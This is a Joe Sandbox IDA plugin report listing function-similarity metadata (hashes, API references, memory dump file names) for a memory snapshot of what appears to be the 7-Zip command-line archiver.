                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$memset
                                                                                                                                                                                                                                • String ID: Extracting archive: $Open$Testing archive:
                                                                                                                                                                                                                                • API String ID: 3543874852-295398807
                                                                                                                                                                                                                                • Opcode ID: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                                                                                • Instruction ID: a04f30224af54615ddbfb1e9654caa55e08e6ef8926e404c4cba29521892e18f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E11BF2275268394DF50AF29E9483E823A0E768B98F588432DE1D4A360EF39C4DAC310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212E47
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212E57
                                                                                                                                                                                                                                • free.MSVCRT ref: 00212EA4
                                                                                                                                                                                                                                  • Part of subcall function 00212CFC: fputs.MSVCRT ref: 00212D41
                                                                                                                                                                                                                                  • Part of subcall function 00212CFC: fputs.MSVCRT ref: 00212DCF
                                                                                                                                                                                                                                  • Part of subcall function 00212CFC: free.MSVCRT ref: 00212DFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                                                • API String ID: 3873070119-2525689732
                                                                                                                                                                                                                                • Opcode ID: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                                                                                                                                                                                • Instruction ID: 9c822486769f787d9b96743ba1ebbbbac50ce6fc702cdf24d19839210d88ce4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88F067A231454090DA20EB26EA5537D5351ABB5FF4F049312ED7D077A8DF38C5558700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 00204A5C
                                                                                                                                                                                                                                • free.MSVCRT ref: 00204A67
                                                                                                                                                                                                                                • free.MSVCRT ref: 00204AE4
                                                                                                                                                                                                                                  • Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339
                                                                                                                                                                                                                                • free.MSVCRT ref: 00204B0F
                                                                                                                                                                                                                                • free.MSVCRT ref: 00204B1A
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
                                                                                                                                                                                                                                  • Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3352498445-0
                                                                                                                                                                                                                                • Opcode ID: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                                                • Instruction ID: 0bc24be3c5b406c73570d171322e0539693611012810c2a358c7f5da95629b63
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6419C63314B8591CB20EF25D8503AE6761FB96B88F488132EB8E4776ADF38C5A5C314
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                • Instruction ID: 9c24a6d30425a585a69bb215a3688a4598961411f98ec7f2f0907136a59d426a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C313C72224B81D6EB50DF28E99439A77B0F394B64F505226EAAD437B4DB3CC995CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$fputsmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4106585527-0
                                                                                                                                                                                                                                • Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                • Instruction ID: a1987cead98a98ab653f3e500ebeb73b894da32227b81394a3ee69d5d8ab9488
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F01006220894091DA20AB25E85155EA721E7E5BE4F445322FA7E877F8DF38C686C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                                                                                • Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                • Instruction ID: cad5a1368d71818abe4554ec5b26c6922b08ca49a7c3f642444e0a04712621ff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1501F22230421182CA30AB25959027E17249BA97F4F584323AE7D873A4CF38CD8B9701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFilefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1936811914-0
                                                                                                                                                                                                                                • Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                • Instruction ID: 4039e0b2dc9dae822d3faa58e306061bd664b179cfff443ff091f5a0c6ee5d8b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87F04426208A4181CA30EB75A99527D66619FE97F4F580322EE7A877F5EF24C9868700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                • Instruction ID: de7d0208f6e501a80340ad5643fc2101ac2c38aa3a0a3eadeab8a784d2712d2e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C751BF72704A8497CB30DF16E8802ADB361F798BD4F404226EBAE47B59DF38D5A5CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                                                • Instruction ID: 8680655fae2bd04494d0e577059b3b5d32b38c8764d61f59be4aaf41d11d2326
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C31836371568886CB60EF16E48052EA7A1F7A87A4B598236FF9E47758DF38C981C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                • Instruction ID: 318f3e380f946c53494b8b0a88d41d496169689d5463727e61e1f495d8027bdb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14118A6120894451DA10EA65E5512BA9760EFE13F4F945322BBBE477E9DF2CC94BCB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3934437811-0
                                                                                                                                                                                                                                • Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                • Instruction ID: 75bd6e2183db3bdb236f7e592a87357f32f1ae3ba6e822327a1e21144b962ae1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C81184637006848BCA209F25E9543AAA760E7627A4F484226EFA9077A9DF78D54AC710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                • Instruction ID: 697fbe99019b2417ee69f4d838ce611d3cd9af81677600195e6f117834b3a554
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B301D62220464481CE20EB22F95517E9331EBE67E4F485223BFBE577AADF38C54AC710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D89D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA
                                                                                                                                                                                                                                • CreateFileW.KERNELBASE ref: 001D8D51
                                                                                                                                                                                                                                • CreateFileW.KERNEL32 ref: 001D8DA4
                                                                                                                                                                                                                                • free.MSVCRT ref: 001D8DB2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateFile$CloseHandlefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 210839660-0
                                                                                                                                                                                                                                • Opcode ID: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                • Instruction ID: 0438f3c7b9179837868a9a2d5197cb9b8f082c47e6410562c0db91848acb10d5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61d1414c3204940837fafab39737341ec41e4676ab64096d397cf1e7feeedc36
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86218033104A819AC7609F55B951A9AB725F3A67F4F544322EFB943BE4CF38C896CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001D3274: memmove.MSVCRT ref: 001D32AC
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212D41
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212DCF
                                                                                                                                                                                                                                • free.MSVCRT ref: 00212DFF
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$fputcfreememmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1158454270-0
                                                                                                                                                                                                                                • Opcode ID: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                • Instruction ID: 97ff6d1841a5d2e0599ec6c648c8fb00819c09dbebfcbf4e615901af23f239f6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce718a67f578e75b63cebf5a55997fc31d3fdfa31f102c43e696e4c730ade246
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0221356261460291CF24EF25E85139E6360FBB9BE4F449222ED6F47768DF3CC595C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3796167841-0
                                                                                                                                                                                                                                • Opcode ID: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                • Instruction ID: 14ae0aba2d625e4e51a1037973d22c08b822e180a559f41fe78653b3e2aee38d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13b8521f385784011c78b9d11a16baa524cd611e63a74d569e705e2f10fdf046
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35519373310755A7DB258F7AE6407A923A0FB44794F140627EF0E87B50DB39E8A6C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputc
                                                                                                                                                                                                                                • String ID: Kernel
                                                                                                                                                                                                                                • API String ID: 1992160199-1736990243
                                                                                                                                                                                                                                • Opcode ID: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                • Instruction ID: b24ae0688e35d9ace16cdc0376c94500d2684c15dcab90ebff5042b46aee9ef6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0587dab81f2bb3112332d7aab628a035a02b5f4d8aa9838a9d6f6812646a1732
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7C09B5575064882EF1457B7F8453651211D75DF91F185070CE2D07350D91CD4D68711
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                  • Part of subcall function 001D2B04: _CxxThrowException.MSVCRT ref: 001D2B2D
                                                                                                                                                                                                                                  • Part of subcall function 001D2B04: free.MSVCRT ref: 001D2B44
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrowfputsfreememset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3104931167-0
                                                                                                                                                                                                                                • Opcode ID: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
                                                                                                                                                                                                                                • Instruction ID: 67f6ad4668cb7745211e4bc4e228ba8e1481d349a292728509af25ef117851e8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ef15fd8aa1144054d3f8c1e688ea89a0331c1f98529cff2cb93b1434cf32894
